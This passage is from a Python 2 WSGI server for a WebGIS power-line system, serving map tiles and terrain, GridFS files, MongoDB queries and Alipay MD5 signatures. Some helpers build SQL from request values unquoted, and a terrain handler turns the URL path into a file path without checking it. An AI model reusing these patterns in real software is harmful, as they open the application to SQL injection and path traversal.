<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>67108864</MatrixWidth>
<MatrixHeight>67108864</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>27</ows:Identifier>
<ScaleDenominator>4.165487467876769</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>134217728</MatrixWidth>
<MatrixHeight>134217728</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>28</ows:Identifier>
<ScaleDenominator>2.0827437339383845</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>268435456</MatrixWidth>
<MatrixHeight>268435456</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>29</ows:Identifier>
<ScaleDenominator>1.0413718669691923</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>536870912</MatrixWidth>
<MatrixHeight>536870912</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>30</ows:Identifier>
<ScaleDenominator>0.5206859334845961</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1073741824</MatrixWidth>
<MatrixHeight>1073741824</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>''' % (
str(tiletype),
str(gConfig['webgis']['wmts']['host']),
str(gConfig['webgis']['wmts']['port']),
str(gConfig['webgis']['wmts']['host']),
str(gConfig['webgis']['wmts']['port']),
str(subtype),
str(subtype),
str(gConfig['mime_type'][gConfig['webgis'][tiletype][subtype]['mimetype']]),
str(subtype),
str(subtype),
)
#<ServiceMetadataURL xlink:href="http://%s:%s/wmts?REQUEST=getcapabilities"/>
return ret
def download_callback(*args, **kwargs):
global gConfig, gMapTileCache, gSatTileCache, gTerrainCache
global STATICRESOURCE_IMG_DIR
zoom, col, row = args[1][2], args[1][0], args[1][1]
root = os.path.abspath(gConfig['wmts']['tiles_map_root'])
if args[2] == mapConst.LAYER_SAT:
root = os.path.abspath(gConfig['wmts']['tiles_sat_root'])
if args[2] == mapConst.LAYER_MAP:
root = os.path.abspath(gConfig['wmts']['tiles_map_root'])
p = os.path.join(root,
str(zoom),
str(col / 1024),
str(col % 1024),
str(row / 1024),
str(row % 1024) + gConfig['wmts']['format']
)
if os.path.exists(p):
key = '%d-%d-%d' % (zoom, col, row)
with open(p, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
if args[2] == mapConst.LAYER_SAT:
gSatTileCache[key] = f1.read()
if args[2] == mapConst.LAYER_MAP:
gMapTileCache[key] = f1.read()
def handle_wmts_GetTile(params):
global gConfig
mimetype, ret = None, None
tiletype = 'webgis/tiles'
arr = tiletype.split('/')
subtype = None
if params.has_key('TILEMATRIXSET'):
subtype = params['TILEMATRIXSET']
level, y, x = None, None, None
if params.has_key('TILEMATRIX'):
level = int(params['TILEMATRIX'])
if params.has_key('TILEROW'):
y = int(params['TILEROW'])
if params.has_key('TILECOL'):
x = int(params['TILECOL'])
if subtype is not None and level is not None and y is not None and x is not None:
tilepath = '%d/%d/%d%s' % (level, x, y, str(gConfig['webgis'][arr[1]][subtype]))
d = {}
d['x'] = str(x)
d['y'] = str(y)
d['level'] = str(level)
mimetype, ret = db_util.gridfs_tile_find(tiletype, subtype, tilepath, d)
return mimetype, ret
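# Editor's note (illustrative example, not from the original source): a KVP
# GetTile request served by handle_wmts_GetTile looks roughly like
#   /wmts?REQUEST=gettile&TILEMATRIXSET=<subtype>&TILEMATRIX=12&TILEROW=1702&TILECOL=3365
# where TILEMATRIX is the zoom level and TILEROW/TILECOL address the tile;
# the numeric values above are placeholders.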
def handle_tiles(environ):
global gConfig, gTileCache
global STATICRESOURCE_IMG_DIR
def get_blank_tile(image_type):
blank_tile = ''
picpath = os.path.join(STATICRESOURCE_IMG_DIR, gConfig['webgis']['tiles'][image_type]['missing'])
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
blank_tile = f1.read()
return blank_tile
headers = {}
#path_info = environ['PATH_INFO']
#d = cgi.parse(None, environ)
querydict, buf = get_querydict_by_GET_POST(environ)
ret = None
mimetype = 'image/png'
image_type = None
#key = path_info.replace('/tiles/','')
if querydict.has_key('image_type') and querydict.has_key('x') and querydict.has_key('y') and querydict.has_key('level'):
image_type = querydict['image_type']
x, y, level = querydict['x'], querydict['y'], querydict['level']
tilepath = '%s/%s/%s%s' % (level, x, y, gConfig['webgis']['tiles'][image_type]['mimetype'])
if not gTileCache.has_key(image_type):
gTileCache[image_type] = {}
if not gTileCache[image_type].has_key('missing'):
gTileCache[image_type]['missing'] = get_blank_tile(image_type)
if gTileCache[image_type].has_key(tilepath):
ret = gTileCache[image_type][tilepath]
else:
try:
mimetype, ret = db_util.gridfs_tile_find('webgis/tiles', image_type, tilepath, querydict)
gTileCache[image_type][tilepath] = ret
except:
print(sys.exc_info())
ret = gTileCache[image_type]['missing']
else:
if image_type:
if not gTileCache.has_key(image_type):
gTileCache[image_type] = {}
if not gTileCache[image_type].has_key('missing'):
gTileCache[image_type]['missing'] = get_blank_tile(image_type)
ret = gTileCache[image_type]['missing']
else:
ret = get_blank_tile('arcgis_sat')
if ret is None:
ret = gTileCache[image_type]['missing']
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
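# Editor's note (illustrative only): handle_tiles expects image_type/x/y/level
# in the query string, e.g.
#   /tiles?image_type=arcgis_sat&level=12&x=3365&y=1702
# and falls back to the configured "missing" tile when the GridFS lookup
# fails; the numbers above are placeholders.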
def handle_terrain(environ):
global gConfig, gTileCache
path_info = environ['PATH_INFO']
#d = cgi.parse(None, environ)
querydict, buf = get_querydict_by_GET_POST(environ)
ret = None
headers = {}
mimetype = str('application/octet-stream')
key = path_info.replace('/terrain/','')
terrain_type = 'quantized_mesh'
if querydict.has_key('terrain_type'):
terrain_type = querydict['terrain_type']
if not gTileCache.has_key(terrain_type):
gTileCache[terrain_type] = {}
if gTileCache[terrain_type].has_key(key):
ret = gTileCache[terrain_type][key]
else:
tilepath = key
if tilepath == 'layer.json':
mimetype, ret = db_util.gridfs_tile_find('webgis/terrain', terrain_type, tilepath, querydict)
gTileCache[terrain_type][key] = ret
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
else:
print('tilepath:%s' % tilepath)
mimetype, ret = db_util.gridfs_tile_find('webgis/terrain', terrain_type, tilepath, querydict)
if ret:
gTileCache[terrain_type][key] = ret
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
else:
if not gTileCache[terrain_type].has_key('missing'):
print('reading mongo blank_terrain...')
tilepath = gConfig['webgis']['terrain'][terrain_type]['missing'] #'0/0/0.terrain'
mimetype, ret = db_util.gridfs_tile_find('webgis/terrain', terrain_type, tilepath, querydict)
gTileCache[terrain_type]['missing'] = ret
ret = gTileCache[terrain_type]['missing']
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
def handle_terrain1(environ):
global gConfig, gMapTileCache, gSatTileCache, gTerrainCache
path_info = environ['PATH_INFO']
#d = cgi.parse(None, environ)
ret = None
headers = {}
key = path_info.replace('/terrain/','')
if gTerrainCache.has_key(key):
ret = gTerrainCache[key]
else:
arr = key.split('/')
tilepath = gConfig['webgis']['terrain']['tiles_dir']
for i in arr:
tilepath = os.path.join(tilepath, i)
tilepath = os.path.abspath(tilepath)
ret = ''
if os.path.exists(tilepath):
#print('reading %s...' % tilepath)
with open(tilepath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
ret = f1.read()
gTerrainCache[key] = ret
else:
if gTerrainCache.has_key('missing'):
ret = gTerrainCache['missing']
else:
print('reading blank_terrain...')
with open(gConfig['webgis']['terrain']['blank_terrain'], 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
ret = f1.read()
gTerrainCache['missing'] = ret
headers['Content-Type'] = 'application/octet-stream'
return '200 OK', headers, ret
def handle_arcgistile(environ):
global gConfig, gMapTileCache, gSatTileCache
global STATICRESOURCE_IMG_DIR
ret = None
headers = {}
dd = cgi.parse(None, environ)
d = {}
for k in dd.keys():
d[k] = dd[k][0]
if d.has_key('zoom') and d.has_key('col') and d.has_key('row'):
zoom = int(d['zoom'])
col = int(d['col'])
row = int(d['row'])
key = '%d-%d-%d' % (zoom, col, row)
if not gSatTileCache.has_key(key):
try:
#picpath = os.path.join(gConfig['wmts']['arcgis_tiles_root'], '_alllayers', 'L%02d' % zoom, 'R%08x' % row, 'C%08x%s' % (col, gConfig['wmts']['format']))
picpath = os.path.join(gConfig['webgis']['wmts']['arcgis_tiles_root'], '%d' % zoom, '%d' % col, '%d%s' % (row, gConfig['webgis']['wmts']['format']))
print('%s, %s' % (key, picpath))
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache[key] = f1.read()
except:
foundit = False
if not foundit:
key = 'missing'
if not gSatTileCache.has_key(key):
picpath = os.path.join(STATICRESOURCE_IMG_DIR, gConfig['webgis']['wmts']['missing'])
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache[key] = f1.read()
ret = gSatTileCache[key]
elif d.has_key('is_esri') :
key = environ['PATH_INFO'].replace('/arcgistile/','')
if not gSatTileCache.has_key(key):
            foundit = True  # flipped in the except handler when the tile file cannot be read
            try:
#picpath = os.path.join(gConfig['webgis']['wmts']['arcgis_tiles_root'], '_alllayers', 'L%02d' % zoom, 'R%08x' % row, 'C%08x%s' % (col, gConfig['webgis']['wmts']['format']))
picpath = os.path.join(gConfig['webgis']['wmts']['arcgis_tiles_root'], key)
print('%s, %s' % (key, picpath))
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache[key] = f1.read()
except:
foundit = False
if not foundit:
key = 'missing'
if not gSatTileCache.has_key(key):
picpath = os.path.join(STATICRESOURCE_IMG_DIR, gConfig['webgis']['wmts']['missing'])
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache[key] = f1.read()
ret = gSatTileCache[key]
else:
if not gSatTileCache.has_key('missing'):
picpath = os.path.join(STATICRESOURCE_IMG_DIR, gConfig['webgis']['wmts']['missing'])
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache['missing'] = f1.read()
ret = gSatTileCache['missing']
headers['Content-Type'] = str(gConfig['mime_type'][gConfig['webgis']['wmts']['format']])
return '200 OK', headers, ret
def handle_wmts(environ):
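    # Minimal WMTS front end: normalises REQUEST/TILETYPE/SUBTYPE (stripping a RESTful
    # '/1.0.0/WMTSCapabilities.xml' suffix) and dispatches to handle_wmts_GetCapabilities
    # or handle_wmts_GetTile.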
dd = cgi.parse(None, environ)
d = {}
headers = {}
mimetype, ret = None, None
for k in dd.keys():
d[k.upper()] = dd[k][0]
if d.has_key('REQUEST') :
d['REQUEST'] = d['REQUEST'].replace('/1.0.0/WMTSCapabilities.xml', '')
if d.has_key('TILETYPE'):
d['TILETYPE'] = d['TILETYPE'].replace('/1.0.0/WMTSCapabilities.xml', '')
if d.has_key('SUBTYPE'):
d['SUBTYPE'] = d['SUBTYPE'].replace('/1.0.0/WMTSCapabilities.xml', '')
if d['REQUEST'].lower() in ['getcapabilities']:
mimetype, ret = handle_wmts_GetCapabilities(d)
elif d['REQUEST'].lower() in ['gettile']:
mimetype, ret = handle_wmts_GetTile(d)
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
def handle_cluster(environ):
global gConfig
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
if int(environ['SERVER_PORT'])==int(gConfig['cluster']['manager_port']) and gConfig['cluster']['enable_cluster'] in ['true','True']:
op = ''
if environ['PATH_INFO']=='/create_cluster':
if len(get_pid_from_name('nginx'))==0:
op = 'create ok'
create_cluster()
elif environ['PATH_INFO']=='/kill_cluster':
op = 'kill ok'
kill_cluster()
#print(environ)
return '200 OK', headers, json.dumps({'result':op})
else:
return '200 OK', headers, json.dumps({'result':'cluster is disabled or not by manager'})
def handle_test(environ):
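    # Simple liveness check: always answers with the fixed string '测试OK' ("test OK").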
s = '测试OK'
headers = {}
d = cgi.parse(None, environ)
#print(d)
headers['Content-Type'] = 'text/json;charset=' + ENCODING
#print(s)
return '200 OK', headers, s
def get_condition_from_dict(dct):
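    # Builds a SQL WHERE fragment by AND-ing a whitelist of keys onto '1=1'. For the
    # 'side' field the values '1'/'0' are mapped to the stored Chinese markers
    # 正 ("front") / 反 ("reverse"); other values are interpolated unquoted, so the
    # inputs are assumed to come from trusted callers. Example (key order may vary):
    #   get_condition_from_dict({'voltage': '220', 'side': '1'})
    #   -> "1=1 AND voltage=220 AND side='正'"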
cond = '1=1'
for k in dct.keys():
if k in ['voltage', 'line_id', 'id', 'tower_id', 'start_tower_id', 'end_tower_id', 'model_code', 'side', 'position']:
if k == 'side':
if dct[k]=='1':
cond += " AND %s='%s'" % (k, u'正')
elif dct[k]=='0':
cond += " AND %s='%s'" % (k, u'反')
else:
cond += " AND %s='%s'" % (k, dct[k])
else:
cond += " AND %s=%s" % (k, dct[k])
#print(cond)
return cond
def mongo_get_condition_from_dict(dct):
ret = {}
for k in dct.keys():
ret[k] = dct[k][0]
print(ret)
return ret
def handle_get_method(environ):
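    # GET entry point of the JSON API. Most of the legacy branches (geojson export,
    # ODBC table queries, upload-file checks) are commented out below; the live path
    # handles op=gridfs (stream or list GridFS files, optionally as an attachment
    # download) and op=gridfs_delete.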
global ENCODING
global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR, UPLOAD_VOICE_DIR
global gConfig
ret = {}
s = ''
querydict, buf = get_querydict_by_GET_POST(environ)
isgrid = False
area = ''
data = {}
headers = {}
clienttype = 'default'
if querydict.has_key('clienttype'):
clienttype = querydict['clienttype']
if querydict.has_key('grid'):
isgrid = True
if querydict.has_key('area'):
area = querydict['area']
# if querydict.has_key('geojson'):
# if querydict['geojson']=='line_towers':
# data = db_util.gen_geojson_by_lines(area)
# s = json.dumps(data, ensure_ascii=True, indent=4)
# elif querydict['geojson']=='tracks':
# data = db_util.gen_geojson_tracks(area)
# s = json.dumps(data, ensure_ascii=True, indent=4)
# else:
# k = querydict['geojson']
# p = os.path.abspath(STATICRESOURCE_DIR)
# if k == 'potential_risk':
# k = 'geojson_%s_%s' % (k, area)
# p = os.path.join(p, 'geojson', area, '%s.json' % k)
# #print(p)
# if os.path.exists(p):
# with open(p) as f:
# f1 = gevent.fileobject.FileObjectThread(f, 'r')
# s = f1.read()
# else:
# p = os.path.abspath(STATICRESOURCE_DIR)
# p = os.path.join(p, 'geojson', '%s.json' % k)
# if os.path.exists(p):
# with open(p) as f:
# f1 = gevent.fileobject.FileObjectThread(f, 'r')
# s = f1.read()
#
#
#
# if querydict.has_key('table'):
# table = querydict['table']
# dbtype = 'odbc'
# if querydict.has_key('dbtype'):
# dbtype = querydict['dbtype']
#
# if dbtype == 'pg':
# data = db_util.pg_get_records(table, get_condition_from_dict(querydict))
# else:
# data = db_util.odbc_get_records(table, get_condition_from_dict(querydict), area)
# if table in ['TABLE_TOWER']:
# if querydict.has_key('line_id'):
# data = db_util.odbc_get_sorted_tower_by_line(querydict['line_id'], area)
#
# if isgrid:
# data = {'Rows':data}
# s = json.dumps(data, ensure_ascii=True, indent=4)
# if querydict.has_key('check_file'):
# fn = querydict['check_file']
# dir_name = querydict['dir_name']
# ret["result"] = {}
# ret["result"]["filename"] = fn
# if dir_name == 'voice':
# if check_voice_file_by_fault(fn):
# ret["result"]["exist"] = "true"
# else:
# ret["result"]["exist"] = "false"
# else:
# if os.path.exists(os.path.join(UPLOAD_PHOTOS_DIR, dir_name, fn)):
# ret["result"]["exist"] = "true"
# else:
# ret["result"]["exist"] = "false"
# s = json.dumps(ret, ensure_ascii=True, indent=4)
# if querydict.has_key('delete_file'):
# fn = querydict['delete_file']
# dir_name = querydict['dir_name']
# ret["result"] = {}
# ret["result"]["filename"] = fn
# if dir_name == 'voice':
# pl = get_voice_file_by(fn)
# if len(pl)>0:
# for i in pl:
# p = os.path.join(UPLOAD_VOICE_DIR, fn)
# if os.path.exists(p):
# os.remove(p)
# ret["result"]["removed"] = "true"
# else:
# ret["result"]["removed"] = "false"
#
# else:
# p = os.path.join(UPLOAD_PHOTOS_DIR, dir_name, fn)
# if os.path.exists(p):
# os.remove(p)
# ret["result"]["removed"] = "true"
# else:
# ret["result"]["removed"] = "false"
# s = json.dumps(ret, ensure_ascii=True, indent=4)
# if querydict.has_key('list_file_dir_name'):
# dir_name = querydict['list_file_dir_name']
# ret["result"] = {}
# ret["result"]["dirs"] = [dir_name, ]
# p = os.path.join(UPLOAD_PHOTOS_DIR, dir_name)
# if os.path.exists(p):
# l = os.listdir(p)
# ret["result"]["files"] = l
# else:
# ret["result"]["files"] = []
# s = json.dumps(ret, ensure_ascii=True, indent=4)
# if querydict.has_key('get_voice_files'):
# get_voice_files = querydict['get_voice_files']
# ret["result"] = {}
# ret["result"]["ids"] = get_voice_file_all()
# s = json.dumps(ret, ensure_ascii=True, indent=4)
if querydict.has_key('op'):
op = querydict['op']
if op == "gridfs":
ret = db_util.gridfs_find(querydict, str(gConfig['wsgi']['application']))
if isinstance(ret, tuple) and ret[0] and ret[1]:
headers['Content-Type'] = str(ret[0])
if querydict.has_key('attachmentdownload'):
headers['Content-Disposition'] = 'attachment;filename="' + enc(ret[2]) + '"'
s = ret[1]
return '200 OK', headers , s
if isinstance(ret, list):
s = json.dumps(ret, ensure_ascii=True, indent=4)
elif op == "gridfs_delete":
try:
db_util.gridfs_delete(querydict, str(gConfig['wsgi']['application']))
ret = ''
except:
ret["result"] = sys.exc_info()[1].message
s = json.dumps(ret, ensure_ascii=True, indent=4)
headers['Content-Type'] = 'text/json;charset=' + ENCODING
if isinstance(ret, dict) and len(ret.keys())==0:
ret["result"] = "ok"
if isinstance(s, list) and len(s)==0:
s = json.dumps(ret, ensure_ascii=True, indent=4)
return '200 OK', headers, s
def create_upload_xls_dir():
global STATICRESOURCE_DIR
p = os.path.join(STATICRESOURCE_DIR, 'upload')
if not os.path.exists(p):
os.mkdir(p)
p = os.path.join(p, 'xls')
if not os.path.exists(p):
os.mkdir(p)
return p
def create_voice_dir():
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
if not os.path.exists(UPLOAD_VOICE_DIR):
os.mkdir(UPLOAD_VOICE_DIR)
def check_voice_file_by_fault(id):
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
create_voice_dir()
ret = False
for fn in os.listdir(UPLOAD_VOICE_DIR):
if id in fn:
ret = True
break
return ret
def get_voice_file_latest(id):
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
create_voice_dir()
l = []
for fn in os.listdir(UPLOAD_VOICE_DIR):
if id in fn:
l.append(fn)
ret = None
if len(l)>0:
l.sort()
ret = l[-1]
return ret
def get_voice_file_by(id):
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
create_voice_dir()
l = []
for fn in os.listdir(UPLOAD_VOICE_DIR):
if id in fn:
l.append(fn)
return l
def get_voice_file_all():
global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR
s = set()
for fn in os.listdir(UPLOAD_VOICE_DIR):
p = os.path.join(UPLOAD_VOICE_DIR, fn)
if os.path.isfile(p):
arr = fn.split('@')
if len(arr)==3:
id = arr[1]
s.add(id)
return list(s)
def create_pic_dir():
global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR
if not os.path.exists(os.path.join(STATICRESOURCE_DIR,'photos')):
os.mkdir(os.path.join(STATICRESOURCE_DIR,'photos'))
if not os.path.exists(UPLOAD_PHOTOS_DIR):
os.mkdir(UPLOAD_PHOTOS_DIR)
def handle_upload_file(querydict, buf):
global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR, UPLOAD_VOICE_DIR
ret = False
# root = os.path.abspath(STATICRESOURCE_DIR)
try:
if querydict.has_key('db'):
db_util.gridfs_save(querydict, querydict['filename'], buf)
ret = True
except Exception,e:
raise
return ret
def import_xls(path, fileobj, area, line_name, voltage, category):
with open(path, 'wb') as f:
f.write(fileobj)
return db_util.import_tower_xls_file(area, line_name, voltage, category, path)
def save_file_to(category, dir_id, filename, fileobj):
root = os.path.abspath(category)
if not os.path.exists(root):
os.mkdir(root)
p = os.path.join(root, filename)
if dir_id:
p = os.path.join(root, dir_id)
if not os.path.exists(p):
os.mkdir(p)
p = os.path.join(root, dir_id, filename)
with open(p, 'wb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'wb')
f1.write(fileobj)
def geojson_to_czml(aList):
cz = czml.CZML()
for i in aList:
if i.has_key('properties') and i['properties'].has_key('id'):
packet = czml.CZMLPacket(id=i['properties']['id'])
#tower
if i['properties'].has_key('tower_code'):
packet = czml.CZMLPacket(id=i['properties']['id'], name=i['properties']['tower_name'])
packet.position = czml.Position(cartographicDegrees = [i['geometry']['coordinates'][0], i['geometry']['coordinates'][1], i['geometry']['coordinates'][2],])
packet.point = czml.Point(show=True, color={'rgba': [255, 255, 0, 255]}, pixelSize=10, outlineColor={'rgba': [0, 0, 0, 255]}, outlineWidth=1)
#packet.label = czml.Label(text=i['properties']['tower_name'], show=True, scale=0.5)
packet.description = i['properties']['tower_name']
#packet.billboard = czml.Billboard(image='http://localhost:88/img/tower.png')
cz.append(packet)
return cz
def handle_post_method(environ):
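    # POST entry point: optionally stores an uploaded file into GridFS, then routes
    # MongoDB requests (db/collection plus optional action/data, with extent extraction
    # or CZML conversion of GeoJSON results) and the non-Mongo branches (thunder SOAP
    # queries, ODBC save/delete/update, altitude lookups, track saving, mobile actions).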
global ENCODING
global gRequest
querydict, buf = get_querydict_by_GET_POST(environ)
ret = {}
is_upload = False
is_mongo = False
use_czml = False
get_extext = False
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
if buf is not None:
try:
is_upload = handle_upload_file(querydict, buf)
except:
pass
if querydict.has_key('db') and querydict.has_key('collection'):
is_mongo = True
dbname = querydict['db']
collection = querydict['collection']
action = None
data = None
if querydict.has_key('action'):
action = querydict['action']
del querydict['action']
if querydict.has_key('data'):
data = querydict['data']
del querydict['data']
if querydict.has_key('use_czml') and querydict['use_czml']:
use_czml = True
del querydict['use_czml']
if querydict.has_key('get_extext') and querydict['get_extext']:
get_extext = True
del querydict['get_extext']
del querydict['db']
del querydict['collection']
if action:
if 'markdown_' in action or u'markdown_' in action:
l = db_util.mongo_action(dbname, collection, action, data, querydict, 'markdown')
else:
l = db_util.mongo_action(dbname, collection, action, data, querydict)
else:
l = db_util.mongo_find(dbname, collection, querydict)
if get_extext:
l = db_util.find_extent(l)
if use_czml:
l = geojson_to_czml(l)
if isinstance(l, list) and len(l) >= 0:
ret = l
elif isinstance(l, dict) and len(l.keys()) > 0:
ret = l
elif isinstance(l, czml.CZML):
headers['Content-Type'] = 'text/json;charset=' + ENCODING
return '200 OK', headers, enc(l.dumps())
#else:
#ret["result"] = "%s.%s return 0 record" % (dbname, collection)
#else:
#ret["result"] = "unknown query operation"
if not is_mongo:
if querydict.has_key('thunder_counter'):
try:
ret = handle_thunder_soap(querydict)
except:
e = sys.exc_info()[1]
if hasattr(e, 'message'):
ret['result'] = e.message
else:
ret['result'] = str(e)
elif querydict.has_key('op'):
if querydict.has_key('area') and querydict['area'] and len(querydict['area'])>0:
if querydict['op'] in ['save','delete','update']:
ret = db_util.odbc_save_data_to_table(querydict['table'], querydict['op'], querydict['data'], querydict['line_id'], querydict['start_tower_id'], querydict['end_tower_id'], querydict['area'])
else:
ret = handle_requset_sync(querydict)
elif querydict['op'] in ['alt','height'] :
if querydict.has_key('lng') and querydict.has_key('lat') and isinstance(querydict['lng'], float) and isinstance(querydict['lat'], float):
ret = db_util.extract_one_altitude(querydict['lng'], querydict['lat'])
if querydict.has_key('data') and isinstance(querydict['data'], list):
ret = db_util.extract_many_altitudes(querydict['data'])
else:
ret["result"] = "unknown area"
elif querydict.has_key('tracks') and querydict.has_key('area'):
ret = db_util.save_tracks(querydict['tracks'], querydict['area'])
elif querydict.has_key('mobile_action') and querydict.has_key('area') and querydict.has_key('data'):
ret = db_util.mobile_action(querydict['mobile_action'], querydict['area'], querydict['data'])
if isinstance(ret, list):
pass
elif isinstance(ret, str) or isinstance(ret, unicode) or isinstance(ret, int) or isinstance(ret, float):
pass
elif isinstance(ret, dict):
if len(ret.keys())==0:
pass
elif ret.has_key('result'):
if isinstance(ret['result'], exceptions.Exception):
if hasattr(ret['result'], 'message'):
ret['result'] = ret['result'].message
else:
ret['result'] = str(ret['result'])
elif isinstance(ret['result'], str) or isinstance(ret['result'], unicode) or isinstance(ret['result'], int) or isinstance(ret['result'], float):
pass
elif isinstance(ret['result'], list) or isinstance(ret['result'], dict):
pass
else:
ret["result"] = "unknown operation"
else:
ret["result"] = "unknown operation"
#time.sleep(6)
#print(ret)
return '200 OK', headers, json.dumps(ret, ensure_ascii=True, indent=4)
# def handle_login(environ):
# global ENCODING
# global gRequest
# buf = environ['wsgi.input'].read()
# ret = None
# try:
# ds_plus = urllib.unquote_plus(buf)
# obj = json.loads(dec(ds_plus))
# if obj.has_key(u'db') and obj.has_key(u'collection'):
# is_mongo = True
# dbname = obj[u'db']
# collection = obj[u'collection']
# action = None
# data = None
# if obj.has_key(u'action'):
# action = obj[u'action']
# del obj[u'action']
# if obj.has_key(u'data'):
# data = obj[u'data']
# del obj[u'data']
# if obj.has_key(u'url'):
# del obj[u'url']
# if obj.has_key(u'redirect'):
# del obj[u'redirect']
# del obj[u'db']
# del obj[u'collection']
# if action:
# ret = db_util.mongo_action(dbname, collection, action, data, obj)
# except:
# raise
# return ret
def handle_thunder_soap(obj):
ret = {}
if obj['thunder_counter'] == 'GetFlashofDate':
ret = soap_GetFlashofDate(obj['start_time'], obj['end_time'])
if obj['thunder_counter'] == 'GetFlashofEnvelope':
ret = soap_GetFlashofEnvelope(obj['start_time'], obj['end_time'], obj['lng1'], obj['lng2'], obj['lat1'], obj['lat2'])
return ret
def dishen_ws_loop(aWebSocket, aHash):
while 1:
#now = time.strftime('%Y-%m-%d %H:%M:%S')[:10]
#ws.send("%d,%f\n" % ((time.time() - time.timezone)*1000, random.random()*10))
#t = (time.time() - time.timezone) * 1000
t = time.time() * 1000
if aWebSocket:
#message = aWebSocket.receive()
#print("message=%s" % message)
aWebSocket.send( '%s\n%d' % (str(aHash),int(t)) )
else:
break
gevent.sleep(1.0)
def check_session(environ, request, session_store):
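    # Cookie-based session handling for the authorize platform: a missing
    # 'authorize_platform_session_id' cookie gets a fresh session, a known one refreshes
    # the cookie via save_if_modified, and an unknown one clears the cookie; returns
    # (session, ('Set-Cookie', ...) header tuple, is_expire flag).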
global gConfig
def set_cookie(key, value):
secure = False
if gConfig['listen_port']['enable_ssl'].lower() == 'true':
secure = True
max_age = int(gConfig['authorize_platform']['session']['session_age'])
cookie = ('Set-Cookie', dump_cookie(key, value, domain=str(gConfig['authorize_platform']['session']['session_domain']), max_age=max_age, secure=secure))
return cookie
sid = request.cookies.get('authorize_platform_session_id')
cookie = None
is_expire = False
sess = None
if sid is None or len(sid)==0:
request.session = session_store.new({})
#session_store.save(request.session)
is_expire = True
cookie = set_cookie('authorize_platform_session_id', request.session.sid )
sess = request.session
else:
request.session = session_store.get(sid)
if request.session:
cookie = set_cookie('authorize_platform_session_id', request.session.sid)
session_store.save_if_modified(request.session)
else:
cookie = set_cookie('authorize_platform_session_id', '')
is_expire = True
sess = request.session
return sess, cookie, is_expire
def get_token_from_env(environ):
global gConfig, gLoginToken
cookie = parse_cookie(environ)
session_id = None
ret = None
if cookie.has_key('session_id'):
session_id = cookie['session_id']
if gLoginToken.has_key(session_id):
ret = gLoginToken[session_id]
return session_id, ret
def get_session_from_env(environ):
global gSessionStore
cookie = parse_cookie(environ)
session_id = None
ret = None
if cookie.has_key('session_id'):
session_id = cookie['session_id']
ret = gSessionStore.get(session_id)
return ret
def get_userinfo_from_env(environ):
global gConfig, gLoginToken
cookie = parse_cookie(environ)
session_id = None
ret = None
if cookie.has_key('session_id'):
session_id = cookie['session_id']
if gLoginToken.has_key(session_id):
ret = gLoginToken[session_id]
return session_id, ret
def get_sign_alipay(sign_data):
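    # MD5 signature for outgoing Alipay requests: hexdigest of the query string plus the
    # partner key, encoded in the configured input charset. Note the md5.digest_size
    # assignment below has no effect on the result; hexdigest() is always 32 hex characters.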
global gConfig
ret = ''
text = sign_data + gConfig['pay_platform']['alipay']['partner_key']
text = enc_by_code(gConfig['pay_platform']['alipay']['input_charset'], text)
if (gConfig['pay_platform']['alipay']['sign_type']).lower() == 'md5':
md5.digest_size = 32
ret = md5.new(text).hexdigest()
return ret
def check_sign_alipay(input_charset, signature, sign_type, original_data):
global gConfig
text = original_data + gConfig['pay_platform']['alipay']['partner_key']
text = enc_by_code(str(input_charset), text)
ret = ''
if str(sign_type).lower() == 'md5':
md5.digest_size = 32
ret = md5.new(text).hexdigest()
return ret == str(signature)
def build_query_string(data={}):
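    # Joins the dict into 'k1=v1&k2=v2' with keys sorted alphabetically and no URL
    # encoding (presumably the canonical form used for signing), e.g.
    #   build_query_string({'b': '2', 'a': '1'}) -> 'a=1&b=2'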
ret = ''
keys = data.keys()
keys.sort()
for k in keys:
ret += '%s=%s' % (k, data[k])
if keys.index(k) < len(keys) - 1:
